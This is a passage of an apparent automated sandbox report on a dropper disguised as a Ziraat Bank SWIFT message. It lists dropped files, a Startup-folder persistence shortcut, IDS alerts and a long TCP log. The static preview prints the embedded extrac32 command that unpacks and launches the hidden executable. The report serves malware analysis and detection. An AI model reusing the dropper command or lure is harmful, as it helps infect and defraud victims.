SSDEEP:	384:A9OoBqeFcfx4QcPQP73me8sDTFzaie/qXr+lIG+pKa:6BqTx4JKh8sDTF5eC8EKa
MD5:	1E500715DF973C14FC9611D971E46833
SHA1:	C0219B235E1971D25389D7E92FB755BDAFF1AD0B
SHA-256:	20E9CA0E1C312C6F21E4BA946D950ECA33CD6116168088E7DC23DE2C03995EC2
SHA-512:	673FC0F2483C842ECA0217239B531070AEAD817D4012158790EE3F861C33E70E346EC76AD06D619D2D3F45E56BE2870A4FB5ADEA786BB9FF1A0825DCE58130E4
Malicious:	false
Preview:	z.0<.\+.T..UE..'.H......s.b@D..c.._T]+.<.Wb....XG;.....".hk.k....M..}..,....W..8bAu.1>$P.nt.h...`...;.I.n.....V...0v..p.....A.w.n.f.~......q4~V.Y...1....1.B:x0....Qs..ld..h..F....:f.V.$.rU.l"@... ...}.R.!......O..WS}..........\}}.d&,...............TB...V..3Q7.Vun.-+....X..?.>.....D.l....t@.....<.W..H(:.....J..i.6f......l.WD.ye.z.0`..\|j:d/..}..C...hf.8....=.M.V^..8=PB...\|>./..`...g>..5...dI..S...}.l...R.p....X...6...../@.=.......u.Q..S.lj....).A..V..Q..jW.;.d.rWgk.f......Z.......1..6..X;...Ec..0./...W.....B.4.(&.B.-B...O..Y.$...4L.j..:..-.#...D.^.......Wr.^bM+...Z:..\C..-.....6.........m..d..I0ay.O.R..N....E....,H.\q\|~.4.d/7U......B...T..v.c..\|....ZP..w.g.0^..B..Hy....1:..yY.xm.~.......V.@*C..... k..h....U.)?.#.:'M.=~z.. ..G..aK"..gK..Y..{..`.j.<..<..b.C..n..5.......g..Z..)....,...n..9AOk:.7D..<.-.5...L.....Z...h.E...L,.0..'=.a^].w .":[/.... . m...@.[.I.ZR....".....%e...F..`.......#...5..2(.=....!..#.f6....w...%.5Ds87m.....?.v

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Wed Nov 13 14:28:13 2024, mtime=Wed Nov 13 14:28:13 2024, atime=Wed Nov 13 14:28:11 2024, length=231936, window=
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	3.5117019448362465
Encrypted:	false
SSDEEP:	24:8eHfCv8pJZjvhosr5UAis4FSnplwO4ZTqlEpm:8eHZFx9D4+plwZTqlk
MD5:	8C0EB79D1C8EF66FE1B953FE515BB2B3
SHA1:	7B08245E5020DE66885DB30A6F7A040BA2E2518A
SHA-256:	995144F60963047873584B279F6DA1189E75916AA131CCD3BB9A7E440F203887
SHA-512:	2BE4A3F1D96DB08F9658F9D5040CD02BAECEEC6A80FBD885B20CCED2ACDA96A8BC7731A8E43C9E01E2E608E226DECFDD34485329B8CEA9FC7B972B6A4530571B
Malicious:	false
Preview:	L..................F.@.. ........5.....5..../..5............................:..DG..Yr?.D..U..k0.&...&...... M......._..5.....5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY}{....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....mY.{..Roaming.@......DWSlmY.{....C.....................%Z..R.o.a.m.i.n.g.....T.1.....mY.{..ACCApi..>......mY.{mY.{....)........................A.C.C.A.p.i.....l.2.....mY.{ .TROJAN~1.EXE..P......mY.{mY.{....*.....................E.Q.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........(8.4.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.614066514976001
Encrypted:	false
SSDEEP:	12:qx/xTzP1eSbZ7u0wxDDDDDDDDjCaY56oOBtFaYAF0B0TB8NGNTI:+/xTzdp7u0wQak6faTFt8Nb
MD5:	3C2E7C3DCEDEF27727CB436F66EEDD00
SHA1:	99DE770CDC4770A3B9CC9D5B7AE1DC1CBD009819
SHA-256:	59CE64750D41F8251A3DEC3249ECA743953791CF8E3AB12EE5243830FC7E3A99
SHA-512:	5F07322D364C43C4A2E312FF00D895C591E2A6AD9F5273CA803D1AAF16317FF573D46169659D6E77C56A9FCC9557850D4DC813E9DA1EA582386401F779ACA523
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x12ae00 (1224192) (1 MB)....Total bytes written = 0x12b000 (1224704) (1 MB).......Operation completed successfully in 0.110 seconds.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 38 datablocks, 0 compression
Entropy (8bit):	6.9171694245444115
TrID:	Microsoft Cabinet Archive (8008/1) 99.91% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
File size:	1'224'635 bytes
MD5:	20234d2431671991411222678e9620f5
SHA1:	88924a49c162ca22ac9ec365a8743cd1647f4501
SHA256:	4003e71429b746c43d34c5ef4e793675dad9d60c7cb63d9e0f8c4d70843faadc
SHA512:	c417071ffb36a21f775ce060822f0b6f2f30235c14191b56ca7e33bf92d95e777d7b1a3c3e89c2935d099751215bd300170261863986c34733f76e1af69226e4
SSDEEP:	24576:fvd1nMLlMSGWqRoNgR+vLqud2f9OwxSibskfYtx:fv2mlsif9zxSibskfYtx
TLSH:	A045C0B7726140B6D4039A36ED0BEBD82838BA393F18A46727FE5F5C6D35696F804143
File Content Preview:	MSCF............u.......................&.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-13T16:28:02.656064+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	198.252.105.91	443	TCP
2024-11-13T16:28:20.241005+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.5	49709	TCP
2024-11-13T16:28:59.061846+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.5	49908	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 16:28:01.562320948 CET	49704	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:01.562376976 CET	443	49704	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:01.562494993 CET	49704	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:01.562669039 CET	49704	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:01.562726974 CET	443	49704	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:01.562787056 CET	49704	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:01.588752985 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:01.588810921 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:01.588882923 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:01.590188980 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:01.590204000 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.655973911 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.656064034 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:02.659718037 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:02.659729004 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.660017014 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.705463886 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:02.751339912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.831747055 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.872745037 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:02.872771978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.920754910 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:02.948836088 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.948848963 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.948882103 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.948896885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.948913097 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.948965073 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:02.948980093 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:02.949004889 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.000785112 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.065411091 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.065422058 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.065448046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.065504074 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.065537930 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.065543890 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.065545082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.065561056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.065574884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.065579891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.065592051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.065619946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.182384014 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.182394981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.182495117 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.182518959 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.182526112 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.182574987 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.299516916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.299542904 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.299637079 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.299658060 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.299705982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.415884972 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.415920019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.415957928 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.415987968 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.416012049 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.416027069 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.532656908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.532704115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.533000946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.533000946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.533025980 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.533081055 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.649812937 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.649931908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.649965048 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.650011063 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.650029898 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.650058031 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.694019079 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.694070101 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.694140911 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.694161892 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.694186926 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.694202900 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.810906887 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.810949087 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.811006069 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.811042070 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.811091900 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.811125040 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.883706093 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.883730888 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.883904934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:03.883934975 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:03.884037971 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.000184059 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.000211000 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.000314951 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.000338078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.000375986 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.065732956 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.065764904 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.065865040 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.065881968 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.065922976 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.443898916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.443926096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.443979025 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.444047928 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.444075108 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.444108009 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.444147110 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.445363045 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.445431948 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.445436001 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.445447922 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.445489883 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.449590921 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.449615955 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.449692011 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.449702024 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.471039057 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.471065044 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.471183062 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.471204996 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.515763998 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.533327103 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.533360004 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.533432007 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.533453941 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.533492088 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.533504009 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.588721037 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.588788986 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.588862896 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.588885069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.588932991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.694298029 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.694329023 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.694420099 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.694437981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.694533110 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.705768108 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.705789089 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.705881119 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.705897093 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.705933094 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.821270943 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.821296930 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.821436882 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.821460009 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.821512938 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.822786093 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.822802067 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.822866917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.822877884 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.822913885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.945275068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.945301056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.945362091 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.945379972 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.945404053 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.945420027 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.946703911 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.946722031 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.946757078 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.946763992 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:04.946791887 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:04.946809053 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.061950922 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.061983109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.062038898 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.062061071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.062083960 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.062102079 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.063704014 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.063723087 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.063775063 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.063779116 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.063808918 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.178700924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.178725004 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.178822041 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.178849936 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.178891897 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.179815054 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.179831982 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.179878950 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.179883957 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.179913998 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.234348059 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.234374046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.234461069 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.234469891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.234551907 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.296103001 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.296128035 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.296230078 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.296257019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.296293020 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.350719929 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.350789070 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.350819111 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.350843906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.350878000 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.350905895 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.412733078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.412755966 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.412856102 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.412883043 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.412942886 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.413861990 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.413880110 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.413944960 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.413952112 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.413985014 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.529216051 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.529283047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.529304981 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.529334068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.529346943 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.529380083 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.530062914 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.530109882 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.530133009 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.530139923 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.530169010 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.530185938 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.584361076 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.584384918 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.584471941 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.584491968 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.584531069 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.646169901 CET	443	49705	198.252.105.91	192.168.2.5
